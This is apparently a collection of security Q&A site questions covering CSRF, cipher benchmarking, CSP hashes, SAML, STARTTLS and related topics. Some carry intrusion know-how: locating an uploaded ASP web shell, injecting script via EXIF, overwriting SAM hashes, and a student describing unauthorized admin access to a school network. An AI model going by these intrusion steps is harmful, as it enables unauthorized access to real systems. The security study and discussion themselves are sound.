I am a university student currently working on a paper on ethical hacking.
I have already researched web-based attacks (SQLi, XSS, etc.) quite a bit, and about two months ago I started learning more about reverse engineering (RE) with Immunity Debugger.
My professor (who is a CCNP and a CCNA instructor) suggested I look into whether it is possible to break into a Cisco or Juniper operating system, but I have no idea where to start.
I already found the links below, but the SecurityTube video is quite old and I don't think it will still work. The last video (about the NSA) intrigued me the most, but it doesn't describe anything technically.
Here are the links to the two videos I described above:
http://www.securitytube.net/video/266
http://gigaom.com/2013/12/29/nsas-backdoor-catalog-exposed-targets-include-juniper-cisco-samsung-and-huawei/
Does anyone know of a knowledge base or information related to breaking into a Cisco or Juniper router that would be beneficial for me?
|
I was pondering computer theory and this question has been bugging me for a while.
Is it possible in some way to have a running process with its memory "encrypted" on an insecure system?
If someone started a thread and its bits were encrypted with a key, wouldn't the key have to be visible in RAM anyway?
I use a lot of remote virtual boxes and want to know if they can even be secure platforms. I can't think of anything that would stop the host from peering into the guest's RAM.
|
What I know about CSRF is that a malicious website tricks a normal user into issuing a request to a trusted website using a form.
I understand that this is possible because we can post forms to different domains. However, I see posts on Stack Overflow saying that one should also protect AJAX requests using a token.
Doesn't the Same-origin policy force an AJAX request to be issued only to the domain that the script was loaded from?
I have heard of Cross-Origin Resource Sharing (CORS), but if my understanding is correct it needs to be enabled by the web server, so a normal server shouldn't allow such requests.
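For context, the token defence those posts describe can be sketched roughly like this; class and method names are illustrative, not from any specific framework. The server stores a random token in the session, embeds it in each page, and rejects state-changing requests whose token does not match:

```java
import java.security.SecureRandom;
import java.util.Base64;

// Minimal sketch of the synchronizer-token pattern: a per-session random
// token that a cross-site attacker cannot read (the same-origin policy
// prevents it), so forged form/AJAX requests fail the comparison.
public class CsrfToken {
    private static final SecureRandom RNG = new SecureRandom();

    // Generate a fresh per-session token (256 bits, URL-safe base64).
    public static String newToken() {
        byte[] raw = new byte[32];
        RNG.nextBytes(raw);
        return Base64.getUrlEncoder().withoutPadding().encodeToString(raw);
    }

    // Constant-time comparison to avoid timing side channels.
    public static boolean isValid(String sessionToken, String requestToken) {
        if (sessionToken == null || requestToken == null) return false;
        if (sessionToken.length() != requestToken.length()) return false;
        int diff = 0;
        for (int i = 0; i < sessionToken.length(); i++) {
            diff |= sessionToken.charAt(i) ^ requestToken.charAt(i);
        }
        return diff == 0;
    }

    public static void main(String[] args) {
        String t = newToken();
        System.out.println(isValid(t, t));          // true
        System.out.println(isValid(t, newToken())); // false (overwhelmingly likely)
    }
}
```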
|
I know that, in theory, Blowfish is much faster than AES. But I benchmarked several algorithms, including AES and Blowfish, on 1 MB, 5 MB, 10 MB, etc. files on the Java 8 platform with the Bouncy Castle library. In every test scenario AES was faster than Blowfish.
I wonder if I made a mistake somewhere?
Here is the code:
import java.security.Key;
import java.security.SecureRandom;
import java.security.Security;
import java.text.DecimalFormat;
import java.util.Arrays;

import javax.crypto.Cipher;
import javax.crypto.KeyGenerator;
import javax.crypto.spec.IvParameterSpec;

import org.bouncycastle.jce.provider.BouncyCastleProvider;

public class CipherBenchmark {

    private static final int WARMUP_COUNT = 5;
    private static final int FILE_LENGTH = 1024 * 512;
    private static final int ITERATOR_COUNT = 1000;
    // Divisor turning summed nanoseconds into an average in milliseconds
    // over the measured (non-warm-up) iterations.
    private static final double BOLME = 1_000_000.0 * (ITERATOR_COUNT - WARMUP_COUNT);

    private static final byte[] ivBytes = new byte[16]; // all-zero IV
    private static final IvParameterSpec ivSpec16bytes = new IvParameterSpec(ivBytes);
    private static final IvParameterSpec ivSpec8bytes =
            new IvParameterSpec(Arrays.copyOfRange(ivBytes, 0, 8));

    static String[] algosWithMode = {
            "AES/CBC/PKCS7Padding", "Blowfish/CBC/PKCS7Padding", "CAST5/CBC/PKCS7Padding",
            "DES/CBC/PKCS7Padding", "DESede/CBC/PKCS7Padding", "IDEA/CBC/PKCS7Padding", "ARC4" };
    static String[] algos = { "AES", "Blowfish", "CAST5", "DES", "DESede", "IDEA", "ARC4" };
    static int[] keyLengths = { 128, 128, 128, 56, 168, 128, 128 };

    @SuppressWarnings("unused")
    public static void main(String[] args) throws Exception {
        if (ITERATOR_COUNT <= WARMUP_COUNT)
            throw new Exception("iterator count must be greater than warm-up count; iterator: "
                    + ITERATOR_COUNT + " warm-up count: " + WARMUP_COUNT);

        Security.addProvider(new BouncyCastleProvider());

        Key key = null;
        byte[] plainText = null;
        byte[] cipherText = null;
        byte[] decryptedText = null;
        long startTime;
        DecimalFormat df = new DecimalFormat("0.000");

        for (int k = 0; k < algos.length; k++) {
            long timeDec = 0, timeEnc = 0, timekey = 0;
            long maxtimeDec = 0, maxtimeEnc = 0, maxtimekey = 0;
            long mintimeDec = Long.MAX_VALUE, mintimeEnc = Long.MAX_VALUE, mintimekey = Long.MAX_VALUE;
            long topDec = 0, topEnc = 0, topkey = 0;

            for (int i = 0; i < ITERATOR_COUNT; i++) {
                SecureRandom random = new SecureRandom();
                plainText = random.generateSeed(FILE_LENGTH);

                // Key generation.
                startTime = System.nanoTime();
                KeyGenerator keyGen = KeyGenerator.getInstance(algos[k]);
                keyGen.init(keyLengths[k], random);
                key = keyGen.generateKey();
                timekey = System.nanoTime() - startTime;

                // Encryption (AES needs a 16-byte IV, ARC4 none, the rest 8 bytes).
                Cipher cipher = Cipher.getInstance(algosWithMode[k]);
                if (k == 0) {
                    cipher.init(Cipher.ENCRYPT_MODE, key, ivSpec16bytes);
                } else if (k == 6) {
                    cipher.init(Cipher.ENCRYPT_MODE, key);
                } else {
                    cipher.init(Cipher.ENCRYPT_MODE, key, ivSpec8bytes);
                }
                startTime = System.nanoTime();
                cipherText = cipher.doFinal(plainText);
                timeEnc = System.nanoTime() - startTime;

                // Decryption.
                cipher = Cipher.getInstance(algosWithMode[k]);
                if (k == 0) {
                    cipher.init(Cipher.DECRYPT_MODE, key, ivSpec16bytes);
                } else if (k == 6) {
                    cipher.init(Cipher.DECRYPT_MODE, key);
                } else {
                    cipher.init(Cipher.DECRYPT_MODE, key, ivSpec8bytes);
                }
                startTime = System.nanoTime();
                cipher.doFinal(cipherText);
                timeDec = System.nanoTime() - startTime;

                // Skip the warm-up iterations when accumulating statistics.
                if (i >= WARMUP_COUNT) {
                    maxtimeEnc = Math.max(maxtimeEnc, timeEnc);
                    maxtimeDec = Math.max(maxtimeDec, timeDec);
                    maxtimekey = Math.max(maxtimekey, timekey);
                    mintimeEnc = Math.min(mintimeEnc, timeEnc);
                    mintimeDec = Math.min(mintimeDec, timeDec);
                    mintimekey = Math.min(mintimekey, timekey);
                    topEnc += timeEnc;
                    topDec += timeDec;
                    topkey += timekey;
                }
            }

            double avgEnc = topEnc / BOLME;
            double avgDec = topDec / BOLME;
            double avgKey = topkey / BOLME;
            System.out.println("******** " + algos[k] + " ********");
            System.out.println("Avg Enc: " + df.format(avgEnc) + " - Avg Dec: " + df.format(avgDec)
                    + " - Avg Key: " + df.format(avgKey));
            System.out.println("Max Enc: " + df.format(maxtimeEnc / 1_000_000.0)
                    + " - Max Dec: " + df.format(maxtimeDec / 1_000_000.0)
                    + " - Max Key: " + df.format(maxtimekey / 1_000_000.0));
            System.out.println("Min Enc: " + df.format(mintimeEnc / 1_000_000.0)
                    + " - Min Dec: " + df.format(mintimeDec / 1_000_000.0)
                    + " - Min Key: " + df.format(mintimekey / 1_000_000.0));
            System.out.println();
        }
    }
}
|
When deploying a mobile-phone best-practices policy, one of the points raised was the requirement for the user to protect his SIM card with a PIN. The theory is that three failed attempts to enter the right PIN switch the SIM card into PUK mode, and 10 failed attempts to enter the PUK make the card unusable.
What is the reality of this assumption? One use of a stolen mobile phone is to robot-call specific numbers and drain the user's account:
Is it practically possible* to crack the PIN code, either directly or by cloning the SIM and testing the 10,000 possible codes?
Is it practically possible* to crack the PUK code? This one is longer, but since it can be recovered by the carrier, a SIM ID can evidently be used to generate such a code.
*) "Practically possible" means doing it quickly enough to use the SIM before it is blocked (say, an hour).
I am interested in the technical aspects of the question (there are legal aspects as well when it comes to a policy; there is also the possibility of fraud with the help of a carrier operator who would generate a PUK).
|
I'm able to upload any file to an ASP web app on an IIS server. My first thought is to upload an ASP shell, but I don't know where the file is being uploaded.
I have written a Python script that, starting from the URLs dumped by ZAP, requests every known folder looking for my ASP file. For example, if I have the URLs /dashboard and /images and my shell is called myshell.asp, my script requests:
/dashboard/myshell.asp
/dashboard/files/myshell.asp
/dashboard/downloads/myshell.asp
/images/myshell.asp
/images/files/myshell.asp
/images/downloads/myshell.asp
But I was unable to find the file.
I know that there exist certain special files that, if present in a subdirectory, have special meaning, like .htaccess. But if I don't know the path, I don't know how to exploit this.
Is this scenario exploitable? How?
|
Is there an external library/approach/whatever to add
canary protection (a stack-protector equivalent)
extra buffer boundary checks (a FORTIFY_SOURCE equivalent)
to C software without using glibc/GCC built-in functionality?
|
I plan on using OpenVPN on client devices which are small embedded machines, so I must balance between speed and security.
The OpenVPN documentation says that it is "general wisdom that 1024-bit keys are no longer sufficient". This refers to the asymmetric keys used for the key exchange.
I should now choose an encryption method. My first thought is to take AES-128, but I'm not sure whether this is (in the "general wisdom" sense) still secure enough for the upcoming (10?) years.
Is there a consensus on this point?
In particular for OpenVPN: are other things more security relevant than the AES key size?
|
Suppose you have an Internet banking site based on a secure web server running the HTTPS protocol via port 443.
The server authenticates itself to clients through an X.509 certificate signed by a CA. The signature is constructed by using RSA encryption of the MD5 hash of the certificate content. The key used for the encryption is a 512-bit private key of the CA.
What are the most obvious weaknesses in such a "setup"? I thought the use of MD5 for integrity would be a weak point, as MD5 has been broken. But since it's encrypted with RSA using a 512-bit private key, I guess the MD5 hash can't really be manipulated?
|
I need some pointers to resources (conference videos, general videos, PDFs, anything) on secure source-code review of multi-tiered web apps built with JAX-WS, Spring, or Hibernate. I am especially interested in knowing what security vulnerabilities can occur when using these specific frameworks. I am currently reading chapters 17, 18, and 19 of the 2nd edition of The Web Application Hacker's Handbook. I think it's good, but I get the feeling it just scratches the surface (a kind of intro). I'm not saying it's not good, but I want to read more about the topic. Any links would be helpful.
Thanks!
|
While performing a pentest for a Java based application I came across an SQL (actually HQL) error by simply putting a single quote in one of the request parameters and breaking the syntax of the query. But as the application made use of Hibernate Query Language as an intermediate layer between the application and the database, I was unable to directly access the database.
HQL does not support UNION or the time-delay-based techniques we generally exploit as pentesters. I was only able to extract all the entries from the table in question. Note that, as the injection was found in a simple search functionality, there was no confidential data in the table. I was unable to extract any database- or system-related information.
I have already looked at this question. My question here is: can using an abstraction layer like this be suggested as a preventive measure during the development phase of an application? In my understanding it can really minimize the damage potential of an SQLi vulnerability (at least in my case, where there is no truly critical data in the database).
Am I missing out on something important here?
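For illustration, the distinction that matters here is not the abstraction layer itself but whether input is concatenated into the query string or bound as a parameter. A minimal sketch (the entity name Product is hypothetical; the Hibernate call shown in the comment is the real-world form):

```java
// Sketch contrasting an injectable HQL pattern with the parameterized form.
public class HqlInjectionDemo {
    // Vulnerable pattern: user input concatenated into the query string,
    // so a single quote breaks the syntax, exactly as observed in the pentest.
    static String concatQuery(String userInput) {
        return "from Product p where p.name = '" + userInput + "'";
    }

    // Safe pattern: the query text is fixed and the input is bound as a
    // parameter, so a quote in the input can never change the syntax.
    // With Hibernate this would be:
    //   session.createQuery("from Product p where p.name = :name")
    //          .setParameter("name", userInput);
    static String parameterizedQuery() {
        return "from Product p where p.name = :name";
    }

    public static void main(String[] args) {
        // A stray quote escapes the string literal in the concatenated form:
        System.out.println(concatQuery("widget' or '1'='1"));
        System.out.println(parameterizedQuery());
    }
}
```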
|
In TrueCrypt I noticed the option to encrypt a volume with multiple encryption algorithms, e.g. AES-Twofish-Serpent. Would it be useful to encrypt something with the same algorithm multiple times? For example AES-AES-AES. I would guess that if a flaw or backdoor in the algorithm were discovered this defense would be useless, but would it make brute-force attacks harder?
EDIT: How is applying multiple iterations any different?
|
Skip to the fifth paragraph for the actual question; before that is some background.
I am a high school student with an interest in computers and penetration testing. Given the restrictions placed on student-level access on the computers at my school, I often attempt privilege escalation in order to gain more complete access to resources that I need (at times school-related, but restricted nonetheless). Although I do that type of stuff pretty often, I never really expect any major success.
A while ago I was taken aback to discover a local admin account without a password, but that did not provide access to anything I couldn't already access, with the exception of the C:\ drive and tools such as the Task Manager and Command Prompt. In other words: it was far from a big discovery for me.
More recently, I stumbled upon a Fuzzy Security post-exploitation/privilege escalation tutorial (here) which mentioned looking for sensitive data in config files left behind by automated desktop setup. I know from quite a bit of searching that the 513 computers on the school's network have been set up in this way. I was still surprised to find the network admin password in plaintext in C:\sysprep\unattend.xml.
Since finding it, I have further investigated what can be done. The things I have found range from accessing all student and teacher files (which, in some cases include exams and exam keys) to remotely connecting to the school server and the district server to add users as students, teachers, admins, and staff, and modify said users' netlogon files to cause them to run malicious programs when they log on. Much of this I have investigated but not tested for fear of being caught.
My question is whether or not I should tell the school tech staff before someone who would abuse it finds it, and if so, how to go about doing so in a way that wouldn't result in my punishment. My worry is that if I report it, evidence of my explorations of network admin capabilities will appear malicious to them. I want to do the right thing, but I would rather not get in trouble if that's what would happen as a result.
|
<?php
header("Content-Security-Policy: default-src 'sha256-".base64_encode(hash('sha256', 'console.log("Hello world");', true))."'");
?>
<script>console.log("Hello world");</script>
However I still receive in Chrome:
Refused to execute inline script because it violates the following
Content Security Policy directive: "default-src
'sha256-1DCfk1NYWuHM8DgTqlkOta97gzK+oBDDv4s7woGaPIY='". Either the
'unsafe-inline' keyword, a hash ('sha256-...'), or a nonce
('nonce-...') is required to enable inline execution. Note also that
'script-src' was not explicitly set, so 'default-src' is used as a
fallback.
I've toyed with this for over an hour but am still unable to generate a hash that matches the examples, e.g.
http://software-security.sans.org/downloads/appsec-2014-files/building-a-content-security-policy-csp-eric-johnson.pdf
It claims <script>alert('Allowed to execute');</script> (hard to determine the original spacing) has a hash of sha256-MmM3YjgyNzI5MDc5NTA0ZTdiCWViZGExZDkxMDhlZWIwNDIwNzU2YWE5N2E4YWRjNWQ0ZmEyMDUyYjVkNjE0NTk=
which doesn't make much sense: the last part doesn't start with sha256-, but at least the first hash is the correct length. I get sha256-nbFv/38jW7zf8mQirwFemFjDwp5CwIaorxe4Z3yycn0= as the hash for alert('Allowed to execute');
http://nmatatal.blogspot.com/2013/09/how-my-script-hash-poc-works.html
Claims:
<script>console.log("Hello world");</script> should have a csp of
script-src 'sha256-y/mJvKQC/3H1UwsYAtTR7Q=='. Eyeballing it, that looks too short.
What am I doing wrong?
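For reference, the value the browser expects is 'sha256-' followed by the base64 of the raw SHA-256 digest of the exact bytes between the script tags, whitespace and newlines included, which is what the PHP above computes. A standalone sketch of the same computation (in Java rather than PHP):

```java
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;
import java.util.Base64;

// Computes a CSP script hash source: 'sha256-' + Base64(SHA-256(body)),
// where body is the exact text between <script> and </script>.
// Any whitespace difference changes the digest, which is why "eyeballed"
// examples copied from slides rarely match.
public class CspHash {
    public static String hashSource(String scriptBody) throws Exception {
        MessageDigest md = MessageDigest.getInstance("SHA-256");
        byte[] digest = md.digest(scriptBody.getBytes(StandardCharsets.UTF_8));
        return "'sha256-" + Base64.getEncoder().encodeToString(digest) + "'";
    }

    public static void main(String[] args) throws Exception {
        // Compare this against the hash Chrome reports in its error message:
        System.out.println(hashSource("console.log(\"Hello world\");"));
    }
}
```

A useful property of Chrome's error message is that it reports the hash of the script it actually saw, so the value it prints can be pasted directly into the policy.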
|
Is it possible to use RSA public and private keys to authenticate two computers (or to make sure they're both the right computers)? If so, how?
Thanks!
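Yes; one common construction is challenge-response: each machine holds the other's public key and proves possession of its own private key by signing a fresh random challenge from the peer. A minimal sketch (key distribution, transport, and replay protection are out of scope here):

```java
import java.security.KeyPair;
import java.security.KeyPairGenerator;
import java.security.PrivateKey;
import java.security.PublicKey;
import java.security.SecureRandom;
import java.security.Signature;

// Sketch of RSA-based machine authentication via challenge-response.
public class RsaChallengeResponse {
    // The prover signs the verifier's random challenge with its private key.
    public static byte[] sign(PrivateKey priv, byte[] challenge) throws Exception {
        Signature s = Signature.getInstance("SHA256withRSA");
        s.initSign(priv);
        s.update(challenge);
        return s.sign();
    }

    // The verifier checks the signature with the prover's known public key.
    public static boolean verify(PublicKey pub, byte[] challenge, byte[] sig) throws Exception {
        Signature s = Signature.getInstance("SHA256withRSA");
        s.initVerify(pub);
        s.update(challenge);
        return s.verify(sig);
    }

    public static void main(String[] args) throws Exception {
        KeyPairGenerator kpg = KeyPairGenerator.getInstance("RSA");
        kpg.initialize(2048);
        KeyPair machineA = kpg.generateKeyPair();

        byte[] challenge = new byte[32];
        new SecureRandom().nextBytes(challenge); // fresh per attempt

        byte[] sig = sign(machineA.getPrivate(), challenge);
        System.out.println(verify(machineA.getPublic(), challenge, sig)); // true
    }
}
```

Doing this in both directions gives mutual authentication; in practice this is exactly what SSH public-key auth and TLS client certificates package up for you.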
|
I was at a coffee shop and had to (I mean had to) check something on my bank account and another account. I figured that since the two websites I was viewing were encrypted, my computer (a Mac) has a firewall, and I don't share anything through a cloud or the like, my information was safe. Google is encrypted from the moment you search, and I connected to the coffee shop's actual Wi-Fi (I had to accept their terms in order to do so).
So I was using HTTPS the entire time. I contacted the bank tech support and they confirmed that their whole website is completely encrypted. Same with the other account. Was I safe? There was a person nearby who looked as if he was doing something suspicious on his computer as far as hacking/networking.
|
I've recently joined a security project, and received a task to demonstrate the risk related to an end-user uploading an image containing embedded (malicious) JavaScript code.
I used EXIFeditor to inject JavaScript code in an image's imgdescription tag, then uploaded the image to the ASP.NET web server using the following C# code:
protected void Upload_File(object sender, EventArgs e)
{
    var postedFile = Upload_fu.PostedFile;
    string fileName = new FileInfo(postedFile.FileName).Name;
    string path = Server.MapPath("~/images/" + fileName);
    postedFile.SaveAs(path);
    Success_msg.Text = "successfully saved";
    img_sr.ImageUrl = "~/images/" + fileName;
}
Note: img_sr is a <asp:Image/> element, and Upload_fu is a <asp:UploadFile/> element.
The JavaScript code I've embedded in the image is a simple alert("Hello world"). However, the code isn't executed (I tried this with Firefox 21 and Internet Explorer 9).
What am I doing wrong?
|
The private and the public key from the cert must have the same algorithm, correct?
Yes of course pub / priv are a key pair.
So this code would be legal, to be more flexible (e.g. ECDSA or DSA):
PrivateKey privkey = (PrivateKey) keystore.getKey(keyAlias, passphrase);
Certificate cert = keystore.getCertificate(keyAlias);
KeyFactory keyFactory = KeyFactory.getInstance(privkey.getAlgorithm()); // before: "RSA"
PublicKey publicKey = keyFactory.generatePublic(keySpec1); // keySpec1 built elsewhere; cert.getPublicKey() would avoid this step
|
Does anybody use publicly available (or relatively cheap) templates of procedures for ISO 27001 to build their own information security management system capable of conforming to the standard?
Any recommendations?
After organically building such a system, did you get it certified? Or was the crucial part reaching comparable metrics and staff behavior, rather than the official papers?
|
I was wondering if it is possible to create a Windows SAM file. I already tried using chntpw, but it seems to only work under a Red Hat-based Linux; i.e., I was able to blank/change the password of a Windows 7 64-bit box on Fedora with chntpw 0.99.5, but I couldn't get it done using BackTrack 5, Ubuntu, or Kali. I know I can recover the password with tools like ophcrack, or just use pwdump or something similar to get the NTLM hashes and then crack them using brute-force or rainbow-table attacks, but I want to know if it is possible to just replace the hash in the SAM file (with physical access to the box, using a live OS). In other words, I just want to know how chntpw works and how to do what it does manually.
Any help is appreciated...
Please note that my problem isn't replacing the password; I know several ways to do that. As I said in the title, I want to know if it is possible to generate a SAM file from NTLM hashes, and how these NTLM hashes are stored in the SAM file. I don't want any tools; if anything, I want a tool that does the reverse of what pwdump does, i.e., takes the hashes and stores them in the SAM file (from a live CD, of course).
|
There are many firewall solutions out there on different operating systems: iptables, pf, ipfw.
My question is: do firewalls run in kernel space, or do they all run in user space? (In general, not just the ones mentioned.)
|
I installed the CAcert root certificates on my Android device (which is not rooted) so that I could visit websites with CAcert server certificates without getting the "certificate not trusted" warning.
But now Android constantly reminds me, at each reboot, that a third party is capable of monitoring my network activity.
How is this possible? Does it mean that even the "standard" trusted certs that come with Android are capable of such a thing too?
|
Since an IP address does not necessarily represent a specific device, but possibly a whole network/company/etc., does it make sense at all to block an IP address when there is a significant number of failed login attempts from it?
I was planning to implement IP checking as well as per-user/account/email attempt limits, but I am not sure whether it is better to leave the IP check out completely.
On the other hand, leaving it out allows an attacker to try a certain number of passwords for every user without ever getting banned (while at the same time locking those users out, since their accounts will be locked for a while).
What is the correct approach to prevent something like that (possibly without using dedicated hardware)?
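One frequently suggested compromise, sketched below with purely illustrative thresholds: count failures per account and per source IP separately, and escalate friction (CAPTCHA, delays) rather than imposing hard lockouts, so an attacker cannot deliberately lock legitimate users out:

```java
import java.util.Map;
import java.util.concurrent.ConcurrentHashMap;

// Sketch of two-signal login throttling. Failures are tracked per account
// AND per IP, but neither signal triggers a hard lockout: the account gets
// extra friction (e.g. CAPTCHA), the IP gets slowed down (tar-pitting).
// Thresholds and the lack of time-window expiry are simplifications.
public class LoginThrottle {
    private final Map<String, Integer> perAccount = new ConcurrentHashMap<>();
    private final Map<String, Integer> perIp = new ConcurrentHashMap<>();
    static final int ACCOUNT_LIMIT = 5;  // then require CAPTCHA for this account
    static final int IP_LIMIT = 50;      // then delay responses to this IP

    public void recordFailure(String account, String ip) {
        perAccount.merge(account, 1, Integer::sum);
        perIp.merge(ip, 1, Integer::sum);
    }

    public boolean requiresCaptcha(String account) {
        return perAccount.getOrDefault(account, 0) >= ACCOUNT_LIMIT;
    }

    public boolean shouldDelay(String ip) {
        return perIp.getOrDefault(ip, 0) >= IP_LIMIT;
    }
}
```

The design point is that the per-IP counter only degrades service quality (making bulk guessing slow), while the per-account counter adds a hurdle a human can still clear, so shared NATed IPs and deliberate lockout attacks both stay manageable.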
|
As I understand it, GnuPG allows the creation of multiple subkeys, but multiple encryption subkeys are problematic because it's not clear which encryption subkey someone should use when sending a message. As such, by default, when a person sends a message to you, their software will select the most recent encryption subkey. This limits the utility of having multiple encryption subkeys on different devices, but not necessarily signing subkeys.
Now, imagine a situation where we have two laptops. Neither laptop contains the master key, but only a single subkey for signing (S) and subkey for encryption (E). Since we have trouble using multiple encryption subkeys, we have a setup like this:
Laptop 1: E, S1
Laptop 2: E, S2
Hence, each laptop has its own signing subkey, but they each share an encryption subkey. Now, say we lose laptop 1. At this point, using the master key, we can revoke the certificates for E and S1. Since the master key was safe, we preserve our WoT. However, since E is no longer valid, we still need to update laptop 2 with a new encryption subkey. Since we always need to update laptop 2 in the case that laptop 1 is compromised, why should we prefer the setup above to a key setup like this:
Laptop 1: E, S
Laptop 2: E, S
Certainly, if we're only signing, having separate signing subkeys for each device makes sense. However, if we need to sign and encrypt, does it still make sense to have separate signing subkeys for each device?
Edit 1
Following up on @jens-erat's answer, I checked and GnuPG does allow us to specify exactly which subkey we use for encryption. Simply append ! after the specified key ID. This forces GnuPG to use that particular key rather than going through its normal calculation of which key to use. This is in the man page under the section "HOW TO SPECIFY A USER ID", subheading "By key Id". Then, as @jens-erat stated, we could add notations to the key specifying which key should be used for which situation or address. By looking at the notation block with --list-sigs and then specifying the exact key with !, we can utilize multiple encryption subkeys. That being said, I don't think this is standard practice, and it will likely cause usability problems for people.
|
We are currently having accounts compromised at a substantially high rate. Some in the organization believe that our password complexity requirements are enough to thwart brute-force attacks.
I wanted to test and demonstrate how certain password complexity requirements can actually reduce the password search space.
Has anyone done this before? What tools should I look into? I specifically would prefer to test it on our Exchange 2010 OWA web page since that is publicly accessible and not rate limited at the moment.
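As a back-of-the-envelope illustration of the "reduced search space" point (character-class sizes assume the 94 printable US-ASCII characters; the rule modelled is "at least one lowercase, one uppercase, one digit"):

```java
// Shows how an "at least one of each class" rule tells an attacker which
// candidates to skip, shrinking the effective search space below the full
// keyspace. Counting uses inclusion-exclusion over the "missing a class"
// sets; doubles are fine at this scale for a rough percentage.
public class SearchSpace {
    // Count of length-n strings over 94 printable chars containing at
    // least one lowercase letter, one uppercase letter, and one digit.
    public static double compliant(int n) {
        double all = Math.pow(94, n);
        double noLower = Math.pow(94 - 26, n);
        double noUpper = Math.pow(94 - 26, n);
        double noDigit = Math.pow(94 - 10, n);
        double noLowerUpper = Math.pow(94 - 52, n); // missing both letter classes
        double noLowerDigit = Math.pow(94 - 36, n);
        double noUpperDigit = Math.pow(94 - 36, n);
        double none = Math.pow(94 - 62, n);         // symbols only
        return all - noLower - noUpper - noDigit
                   + noLowerUpper + noLowerDigit + noUpperDigit - none;
    }

    public static void main(String[] args) {
        int n = 8;
        double all = Math.pow(94, n);
        double c = compliant(n);
        System.out.printf("full keyspace: %.3e, policy-compliant: %.3e (%.1f%%)%n",
                all, c, 100 * c / all);
    }
}
```

For 8-character passwords this comes out at roughly half the full keyspace, i.e. an attacker who knows the policy gets about one bit of search space for free; the far bigger effect in practice is that users satisfy such rules with predictable patterns (Password1!), which is what cracking tools' rule sets target.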
|
We seem to spend a lot of time guarding against Man-In-The-Middle (MITM) attacks without discussing who we are actually guarding against.
This is important because if these individuals are unlikely to attack our website or the cost of them doing so is minimal then we can afford to spend less resources guarding against such attacks. For example: https://security.stackexchange.com/a/58729/5002
My understanding is that there are only two ways to intercept internet packets:
Tap into the physical layer (i.e. the phone/cable lines outside my house or WiFi connection).
Tap into ISP infrastructure (the hops between my computer and the destination website).
There are only two kinds of people who can carry out these taps:
Anyone with technical knowledge to tap into the physical layer, or hack an ISP.
Anyone with legal power to compel ISPs to intercept the packets.
This leads to three kinds of attackers:
Rogue individuals.
Corporate spies.
The government.
The point I'm trying to make is that if your website is not financially or politically significant (e.g. Stack Overflow) then it is unlikely that MITM attacks are all that relevant. The most an attacker can do is vandalize the site, the probability that anyone would want to do so is low, and the cost of recovery is relatively low. Your average script kiddie might have the motivation, but lacks the technical ability to do so.
Am I missing anything? :)
|
I'm having trouble with a spammer and would like to begin submitting their messages to a few black hole lists.
Unfortunately, I'm having trouble finding a list. For example, mail-abuse.org now redirects to Trend Micro's site and there's nothing of substance available (just a dashboard showing spam densities per country).
Are there any black hole lists remaining that accept submissions? What is the state of the art in protection from targeted email?
|
I've heard from several people that private repository hosts like Bitbucket are not really safe. I've heard rumours about code being stolen from private repositories and used by others.
Is it true? Is there any evidence that cases like that have happened?
|
I have a use case forced upon me by industry regulation. I wish it wasn't there, but it is.
A user logs in to my service, navigates around, etc. The user can perform many actions, but one of the actions requires (by industry regulation) that the user re-enter the username and password prior to continuing. It does not matter if the user logged in 5 seconds beforehand. In order to complete this action the user must re-enter the username and password.
We are looking to integrate with another company, using SAML to power SSO and Federated IDs. Is there a way for us to tell the IdP to re-authenticate the user, even if the user is already authenticated?
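For what it's worth, the SAML 2.0 protocol defines a ForceAuthn attribute on the authentication request for exactly this situation: when it is true, the IdP must re-authenticate the user even if a session exists (whether a given IdP honours it is worth verifying). A sketch of such a request, with placeholder IDs and URLs:

```xml
<!-- Hypothetical AuthnRequest; only ForceAuthn="true" is the point here. -->
<samlp:AuthnRequest
    xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"
    xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion"
    ID="_example-request-id"
    Version="2.0"
    IssueInstant="2014-01-01T00:00:00Z"
    ForceAuthn="true"
    AssertionConsumerServiceURL="https://sp.example.com/acs">
  <saml:Issuer>https://sp.example.com</saml:Issuer>
</samlp:AuthnRequest>
```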
Thanks
Alan
|
Is there an easy way to test an SMTP server to check for configuration issues associated with STARTTLS encryption, and report on whether it has been configured properly so that email will be encrypted using STARTTLS?
Think of the Qualys SSL server tester as an analogy: it is a great tool to quickly check whether a webserver's use of SSL has been properly configured, and to identify opportunities for improving the configuration to provide stronger encryption. It knows how to recognize many common configuration errors and gives a grade. Is there anything like that for STARTTLS on SMTP servers?
In particular, given a SMTP server, I would like to tell:
whether it supports STARTTLS,
whether its STARTTLS configuration has been set up properly so that email with other major email providers will end up being encrypted,
whether it supports perfect forward secrecy and whether it is configured so that the perfect forward secrecy ciphersuites will be used in practice (where possible),
whether it provides a suitable certificate that will pass strict validation checks,
whether it has any other configuration errors.
How can I do this?
Facebook and Google have recently highlighted the state of STARTTLS usage on the Internet and called for server operators to enable STARTTLS and configure it appropriately so that email will be encrypted while in transit. Are there easy-to-use tools to support this goal?
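As a starting point, the first bullet can be checked with a plain SMTP dialogue. The sketch below only parses an EHLO reply for the STARTTLS capability, with the network side described in comments, so the logic can be exercised without a live server:

```java
// Sketch of the first check in the list above: does a server advertise
// STARTTLS? A real probe would open a socket to port 25, read the banner,
// send "EHLO test", collect the multi-line reply, and, if STARTTLS is
// advertised, issue it and hand the socket to an SSL engine to inspect
// the certificate and negotiated cipher suites. Only the reply parsing
// is implemented here so it can be tested offline.
public class StartTlsProbe {
    // EHLO replies look like "250-PIPELINING", "250-STARTTLS", "250 HELP":
    // a 250 code, then '-' (more lines follow) or ' ' (last line), then
    // the capability keyword.
    public static boolean advertisesStartTls(String ehloReply) {
        for (String line : ehloReply.split("\r?\n")) {
            if (line.length() > 4
                    && line.startsWith("250")
                    && line.substring(4).trim().equalsIgnoreCase("STARTTLS")) {
                return true;
            }
        }
        return false;
    }

    public static void main(String[] args) {
        String reply = "250-mx.example.com\r\n250-PIPELINING\r\n250-STARTTLS\r\n250 HELP";
        System.out.println(advertisesStartTls(reply)); // true
    }
}
```

The deeper checks in the list (certificate validation, forward-secrecy cipher preference) need a TLS handshake against the real server, which is the part a hosted tester would automate.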
|
I am trying to figure out how my server was compromised. The attackers installed IptabLes and IptabLex in /boot.
They also added /etc/init.d/IptabLes and /etc/init.d/IptabLex which simply call the respective /boot files. It seems this attack uses a lot of bandwidth (probably a DDoS); I noticed it immediately.
The server is running CentOS 6.5 with all the latest updates.
It runs logstash, redis, ElasticSearch, and Cherokee webserver serving Kibana.
I am thinking it must either be ElasticSearch or Cherokee web-server.
